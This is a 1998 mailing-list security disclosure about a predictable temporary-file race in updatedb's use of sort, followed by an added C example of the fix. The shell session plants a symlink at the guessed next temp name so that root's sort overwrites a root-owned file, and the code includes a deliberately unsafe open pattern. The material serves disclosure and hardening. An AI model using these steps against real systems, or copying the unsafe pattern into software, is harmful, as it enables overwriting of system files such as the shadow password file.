Re: overwrite any file with updatedb
This message is crossposted to the Bugtraq and debian-devel mailing lists.
Please post replies to the relevant list(s) only.
On Mon, 2 Mar 1998, Bryan Andregg wrote:
> On Sun, 1 Mar 1998 22:44:11 -0500, Cain wrote:
>
> >If this is already known, my apologies. It seemed very strange that this
> >worked, so I thought it would be mentionable.
> >
> >On many linux systems (Redhat in particular) updatedb is run nightly
> >around 1:00. When it sorts the files that find gets, it creates a few files
> >in /tmp called sort0<pid>000{1,2,etc}. Each is around 512k. The
> >first file is created and filled, then if necessary, another is created
> >and so on until it has your whole filesystem into a nice database. Well,
> >once the first file is created you can easily guess what the next filename
> >will be called as only the last character will change. If you create a
> >link to say, the shadow password file, updatedb will kindly overwrite it
> >for you. Ex:
>
> It should be pointed out that on Red Hat 4.2 and 5.0 updatedb runs as user
> nobody by default.
>
> This is not a security issue unless you are running a distribution at least a
> year old.
>
> We will be checking for the proper use of temp files in the source also.
I don't have a Red Hat system at hand to test this, so let me tell you
what it's like on a Debian pre-2.0 system, which I am currently using.
On my system, this bug is present.
Daily, cron runs "run-parts /etc/cron.daily" as root. In this directory is
a file named "find" with these contents:
----begin----
#! /bin/sh
#
# cron script to update the `find.codes' database.
#
# Written by Ian A. Murdock <imurdock@debian.org> and
# Kevin Dalley <kevin@aimnet.com>
if [ -f /etc/updatedb.conf ]; then
. /etc/updatedb.conf
fi
cd / && updatedb --localuser=nobody 2>/dev/null
----end----
/usr/bin/updatedb is a bash script which calls sort to sort the file
lists. Thus, sort runs as root.
This makes the whole thing easy to exploit (things between dashes are
comments):
# touch /root/testfile
# ls -l /root/testfile
-rw-r--r-- 1 root root 0 Mar 3 10:16 /root/testfile
# /etc/cron.daily/find
-- other xterm --
$ cd /tmp
$ ls
sort1636700000
$ ln -s /root/testfile sort1636700002
-- wait a while --
$ ls
sort1636700000 sort1636700001 sort1636700002 sort1636700003
-- other xterm --
# ls -l /root/testfile
-rw-r--r-- 1 root root 524275 Mar 3 10:27 /root/bla
-- end of session --
I think the only way to really fix this is to patch sort, so that it
doesn't create files with easy-to-predict names. See "man 3 tmpfile" for a
good hint on this.
Remco Blaakmeer
Owner of a Debian GNU/Linux system
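
The fix suggested in the message above (temporary files that cannot be pre-empted by a link at a guessable name), as an added example that is not part of the original mail or of the sort source. The function names, the scratch directory and the "sort0000100002" file name are constructed for the demonstration; mkstemp(3) is used here as a close relative of the tmpfile(3) call the message points to.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Unsafe pattern: open a guessable name; O_CREAT alone follows a symlink
   that is already sitting at that path and truncates its target. */
int open_predictable(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened: with O_CREAT|O_EXCL, open() fails (EEXIST) if anything exists
   at the path, including a symlink, which is not followed. */
int open_exclusive(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Preferred: mkstemp() fills in the XXXXXX with an unpredictable suffix and
   creates the file exclusively with mode 0600. */
int open_unpredictable(char *tmpl) { return mkstemp(tmpl); }

/* Constructed demo in a private scratch directory: a symlink to "victim"
   waits at the guessed name. Returns victim's size after the write attempt,
   or -1 on setup failure. */
long demo(int hardened) {
    char dir[] = "/tmp/tmpdemoXXXXXX", victim[64], guess[64];
    struct stat st;
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(guess, sizeof guess, "%s/sort0000100002", dir); /* made-up name */
    int vfd = open(victim, O_WRONLY | O_CREAT, 0600);
    if (vfd < 0 || symlink(victim, guess) != 0) return -1;
    close(vfd);
    int fd = hardened ? open_exclusive(guess) : open_predictable(guess);
    if (fd >= 0) {
        ssize_t n = write(fd, "sorted data\n", 12);
        (void)n;
        close(fd);
    }
    long size = stat(victim, &st) == 0 ? (long)st.st_size : -1;
    unlink(guess); unlink(victim); rmdir(dir);
    return size;
}

int main(void) {
    printf("predictable name: victim is %ld bytes\n", demo(0));
    printf("O_EXCL:           victim is %ld bytes\n", demo(1));
    return 0;
}
```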